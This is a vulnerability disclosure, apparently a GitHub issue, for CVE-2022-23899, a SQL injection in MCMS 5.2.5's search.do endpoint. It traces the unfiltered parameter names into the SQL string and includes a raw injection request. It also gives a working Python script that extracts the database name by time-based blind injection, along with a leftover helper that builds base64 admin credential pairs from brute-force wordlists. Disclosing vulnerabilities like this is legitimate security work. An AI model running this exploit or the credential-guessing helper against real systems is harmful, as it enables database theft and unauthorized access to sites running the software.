
CVE-2022-23899: MCMS5.2.5 net/mingsoft/cms/action/web/MCmsAction.java SQLI · Issue #63 · ming-soft/MCMS

MCMS v5.2.5 was discovered to contain a SQL injection vulnerability via search.do in the file /web/MCmsAction.java.


As you can see, the injection succeeded. The next step is to save the captured request and feed it to sqlmap.

Search for the field and locate where the incoming parameter enters.

Since the parameter names are concatenated directly into the SQL string without any filtering, there may be a vulnerability here, so let's follow the data flow to the next link in the chain.


This block is where the database call is made.

Next we try to inject. The annotation at the top of the class definition in net/mingsoft/cms/action/web/MCmsAction.java shows the route is host:port/mcms; appending the method to be called gives host:port/mcms/search.do. Now try the injection:

GET /mcms/search.do?1'=0000 HTTP/1.1
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Postman-Token: 315bc447-c977-4eb8-8b99-ae231e7a2b08
Host: localhost:8080
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=96B0978724C81C34A99F09541FA893D4


Next I wrote a Python script for convenient verification, using time-based (delayed) injection:

import base64

import requests

# Time-based blind injection template. The injected text is placed in the
# parameter NAME (the value, 000, is irrelevant) because MCMS splices parameter
# names straight into the SQL string. Placeholders:
#   {0}: the expression to extract (e.g. database())
#   {1}: start position for substr()
#   {2}: length for substr()
#   {3}: the guessed value (an ASCII code)
host = "http://localhost:8080/mcms/search.do?'%2b(select+'123'+AND+if(ascii(substr({0},{1},{2}))%3d{3},sleep(2),2)),--+=000"


def a():
    """Unrelated helper left in the script: writes base64("admin:<pwd>") for
    every password in a wordlist. It is not called by the injection code."""
    with open("/Users/helu/penetration/bruteDicts/account/top500_username.txt", "r") as usernames:
        with open("/Users/helu/penetration/bruteDicts/account/pwdFast.txt", "r") as pwds:
            with open("/Users/helu/penetration/bruteDicts/account/admin_pwd.txt", "a+") as file:
                data1 = usernames.read().splitlines()
                data2 = pwds.read().splitlines()
                for username in data1:
                    for pwd in data2:
                        encoded = base64.encodebytes(("admin" + ":" + pwd).encode("utf-8"))
                        file.write(encoded.decode("utf-8"))


def timeout(url):
    """Fetch url; a request that exceeds 3 s is treated as the sleep() firing."""
    try:
        rsp = requests.get(url, timeout=3)
        return rsp.text
    except Exception:
        return "timeout"


def guess_length(target):
    """Guess the length of target (e.g. length(database())) by testing the
    ASCII code of its first character. Only correct for single-digit lengths."""
    for i in range(1, 100):
        url = host.format(target, 1, 1, i)
        rsp = timeout(url)
        if "timeout" in rsp:
            print("length: " + chr(i))
            return int(chr(i))
    return 0


def guess_char(tar, length):
    """Recover tar character by character (substr() positions are 1-based)."""
    result = ""
    for i in range(1, length + 1):
        for j in range(47, 123):
            url = host.format(tar, i, 1, "'{0}'".format(j))
            rsp = timeout(url)
            if "timeout" in rsp:
                print(chr(j))
                result += chr(j)
                break
    return result


def b(tar):
    """Guess the length of the current database name, then extract it."""
    length = guess_length(tar)
    return guess_char("database()", length)


if __name__ == "__main__":
    b("length(database())")
